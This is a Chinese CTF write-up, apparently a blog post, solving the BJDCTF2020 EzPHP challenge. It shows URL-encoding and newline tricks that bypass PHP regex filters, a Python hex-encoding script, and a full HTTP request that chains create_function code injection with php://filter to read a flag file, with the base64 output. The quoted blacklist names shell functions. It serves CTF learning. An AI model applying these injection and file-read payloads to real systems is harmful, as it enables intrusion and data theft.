php br2nl,[BJDCTF2020]EzPHP

[BJDCTF2020]EzPHP

$_SERVER['QUERY_STRING']

if( preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])

)die('You seem to want to do something bad?');

这里学到一个东西

$_SERVER['QUERY_STRING'])是不会自动urldecode的,我们可以先urlencode一次再传入,这也就是绕过原理。

$GET[]会自动urldecode一次。

这一段是很恶心的,和其他的组成一套超级难受的过滤,每次都要输入一遍。

比如传入debu变量的时候。

下面是举例生成debu变量的脚本 (python2),

def payloadIng( fxck ):

payload = ""

for i in fxck:

if (i != '='):

payload += "%"+i.encode('hex')

else:

payload += i

return payload

debu = "debu=aqua_is_cute\n"

file = "file=data://text/plain,debu_debu_aqua"

part_debu = payloadIng( debu )

print(part_debu)

part_file = payloadIng( file )

print(part_file)

#输出

#%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a

#%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

#%66%6c%61%67%5b%61%72%67%5d=%7d%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f%26%66%6c%61%67=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e

下面会分析为什么

debu的值是 debu=debu_debu_aqua\n

第二个正则

if (!preg_match('/http|https/i', $_GET['file'])) {

if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {

$file = $_GET["file"];

echo "Neeeeee! Good Job!
";

}

} else die('fxck you! What do you want to do ?!');

/^aqua_is_cute$/这个的后面没有给参数,所以可以用换行符%0a过滤。

下面是几个模式匹配符。

i:ignorCase忽略大小写

m:mutiple允许多行匹配

g:globle进行全局匹配,指匹配到目标串的结尾

我们加入换行符就可以完美匹配到目标字符串,并且我们传入的字符串也不和目标完全相同。

debu=aqua_is_cute\n

记得url编码。。。。。。。。。。。。。。。

preg_match('/[a-zA-Z]/i', $value)

非人正则.

if($_REQUEST) {

foreach($_REQUEST as $value) {

if(preg_match('/[a-zA-Z]/i', $value))

die('fxck you! I hate English!');

}

}

又滚去看了师傅的wp,

啊……坐了一下午到现在,太累了……不写了,把自己的报文留一下。

好回顾,改天再写wp。

POST /1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61%5b%5d=%31&%70%61%73%73%77%64%5b%5d=%32&%66%6c%61%67%5b%61%72%67%5d=%7d%72%65%71%75%69%72%65%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%5b%5f%47%45%54%5d%5b%72%63%65%5d%29%3b%2f%2f&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&rce=%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%72%65%61%64%3d%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%65%6e%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%72%65%61%31%66%6c%34%67%2e%70%68%70 HTTP/1.1

Host: b1d178c8-f2f4-4376-a7db-3b42c0ad8725.node3.buuoj.cn

Content-Length: 29

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

Origin: http://b1d178c8-f2f4-4376-a7db-3b42c0ad8725.node3.buuoj.cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://b1d178c8-f2f4-4376-a7db-3b42c0ad8725.node3.buuoj.cn/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61%5b%5d=%31&%70%61%73%73%77%64%5b%5d=%32&%66%6c%61%67%5b%61%72%67%5d=%7d%72%65%71%75%69%72%65%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%4d%57%5a%73%59%57%63%75%63%47%68%77%29%29%3b%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

Connection: close

file=1&%64%65%62%75=1&rce=2

PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4NCjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQo8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIG1heGltdW0tc2NhbGU9MSwgdXNlci1zY2FsYWJsZT1ubyI+DQo8dGl0bGU+UmVhbF9GbGFnIEluIEhlcmUhISE8L3RpdGxlPg0KPC9oZWFkPg0KPC9odG1sPg0KPD9waHANCgllY2hvICLlkqbvvIzkvaDlsYXnhLbmib7liLDmiJHkuobvvJ/vvIHkuI3ov4fnnIvliLDov5nlj6Xor53kuZ/kuI3ku6PooajkvaDlsLHog73mi7/liLBmbGFn5ZOm77yBIjsNCgkkZjRrZV9mbGFnID0gIkJKRHsxYW1fYV9mYWtlX2Y0MTExMWcyMzMzM30iOw0KCSRyZWExX2YxMTE0ZyA9ICJmbGFnezYzNjVkOTY3LWEwZDUtNDUwOC04YTE2LTA1ZDY1NDYwMjk3Zn0iOw0KCXVuc2V0KCRyZWExX2YxMTE0Zyk7DQo=

做题的时候,发现群里在聊天。怎么说呢,有人督促,真的挺好的,就像老师,像家人,很温暖,可能被督促习惯了吧。

当初入门是大哥们带进来的。

现在自己确实喜欢上了这个,也愿意保持这种"熬“的感觉。

即便不会,即便什么也看不懂,我也有心情肝下去。

希望自己可以保持这种热爱。

即便一直菜下去(希望自己以后也有贡献吧,不要做一个一直索取的人)。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值